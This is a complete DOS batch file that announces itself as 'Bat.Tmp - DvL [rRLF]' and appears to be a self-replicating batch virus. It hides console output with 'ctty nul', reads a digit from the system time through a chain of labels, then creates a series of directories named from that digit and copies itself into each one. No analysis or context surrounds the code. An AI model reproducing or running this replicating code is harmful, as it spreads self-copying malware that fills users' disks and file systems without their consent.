@ctty nul
@echo off
echo.>con
echo.>con
echo.>con
echo                    +------------------------------------+>con
echo                    I        Bat.Tmp - DvL [rRLF]        I>con
echo                    +------------------------------------+>con
echo.>con
echo.>con
:a0
ver|time|find ",0">nul
if errorlevel 1 goto a9
if not errorlevel 1 set _=0
goto fun
:a9
ver|time|find ",9">nul
if errorlevel 1 goto a8
if not errorlevel 1 set _=9
goto fun
:a8
ver|time|find ",8">nul
if errorlevel 1 goto a7
if not errorlevel 1 set _=8
goto fun
:a7
ver|time|find ",7">nul
if errorlevel 1 goto a6
if not errorlevel 1 set _=7
goto fun
:a6
ver|time|find ",6">nul
if errorlevel 1 goto a5
if not errorlevel 1 set _=6
goto fun
:a5
ver|time|find ",5">nul
if errorlevel 1 goto a4
if not errorlevel 1 set _=5
goto fun
:a4
ver|time|find ",4">nul
if errorlevel 1 goto a3
if not errorlevel 1 set _=4
goto fun
:a3
ver|time|find ",3">nul
if errorlevel 1 goto a2
if not errorlevel 1 set _=3
goto fun
:a2
ver|time|find ",2">nul
if errorlevel 1 goto a1
if not errorlevel 1 set _=2
goto fun
:a1
ver|time|find ",1">nul
if errorlevel 1 goto a0
if not errorlevel 1 set _=1
:fun
for %%_ in (%_%;%_%%_%;%_%%_%%_%;%_%%_%%_%%_%;%_%%_%%_%%_%%_%;%_%%_%%_%%_%%_%%_%;%_%%_%%_%%_%%_%%_%%_%) do md %%_%_%%%_>nul
for %%_ in (%_%;%_%%_%;%_%%_%%_%;%_%%_%%_%%_%;%_%%_%%_%%_%%_%;%_%%_%%_%%_%%_%%_%;%_%%_%%_%%_%%_%%_%%_%) do copy %0 %%_%_%%%_>nul
cls